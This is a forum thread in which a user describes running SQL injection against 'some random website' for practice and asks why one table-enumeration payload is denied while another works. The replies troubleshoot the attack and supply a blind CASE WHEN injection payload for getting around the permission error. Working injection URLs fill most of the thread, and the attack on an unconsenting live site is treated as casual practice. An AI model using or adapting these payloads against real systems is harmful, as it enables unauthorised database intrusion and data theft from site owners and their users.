SQL Injection why doesn't a table name check work with concat

[hppd]

Hello
I was practising my sqli on some random website. So everything was going fine up until checking the table names. So I tried

Code: [Select]

page.php?ID=0x2d7+union+all+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+infromation_schema.tablesIt gave the error:

Code: [Select]

SELECT command denied to user 'usrmcv'@'127.0.0.1' for table 'tables'
So then I tried

Code: [Select]

/page.php?ID=0x2d7/**/union/**/all/**/select/**/1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+FROM+information_schema.tables+LIMIT+1,1
Like this I could browse through the tables and I was wondering why that is???

[ande]

Just a little note: In the first request you are retrieving data in the second column, in the second request you are retrieving data in the third column. Probably makes no difference tho.

This is actually odd. As far as I know, there is no command specific and table specific permissions combined like: If you have access to the table and you can in fact use the group_concat command, there should be no additional permissions for that specific command against that specific table. Are you sure you didn't just typo or something?

Can you group_concat something else from that table? Can you group_concat something else from another table?

[Z3R0]

The database user doesn't have permission to do the select command, and since the user it gave the error back as isn't root you won't be able to grant the permissions to the usrmcv user by yourself.

Try using CASE WHEN queries with your SELECT query to try bypassing the file priv restrictions. For example:

Code: [Select]

page.php?ID=(case(substr((select(group_concat(table_name))from(information_schema.tables)),1,1))when(0x74)then(1)else(2)end)
Keep in mind, with this query, it will only work if all of the concatenated tables begin with the lower-case letter "t" (x74 hexadecimal). I'm not sure if it will work, because you'll still be using SELECT, but it might because of the CASE WHEN stipulation. You may also run into a problem if the database doesn't allow stacked queries.

[ande]

The database user doesn't have permission to do the select command, and since the user it gave the error back as isn't root you won't be able to grant the permissions to the usrmcv user by yourself.

Try using CASE WHEN queries with your SELECT query to try bypassing the file priv restrictions. For example:

Code: [Select]

page.php?ID=(case(substr((select(group_concat(table_name))from(information_schema.tables)),1,1))when(0x74)then(1)else(2)end)
Keep in mind, with this query, it will only work if all of the concatenated tables begin with the lower-case letter "t" (x74 hexadecimal). I'm not sure if it will work, because you'll still be using SELECT, but it might because of the CASE WHEN stipulation. You may also run into a problem if the database doesn't allow stacked queries.

I don't think there is a permission problem seeing how he was able to use the SELECT command on the second query only not using group_concat. But yes, you are right in your statement, CASE WHEN and HAVING are useful for circumventing such problems.

[Z3R0]

@ande LOL derp, I didn't see he wrote that his second query worked. My mistake!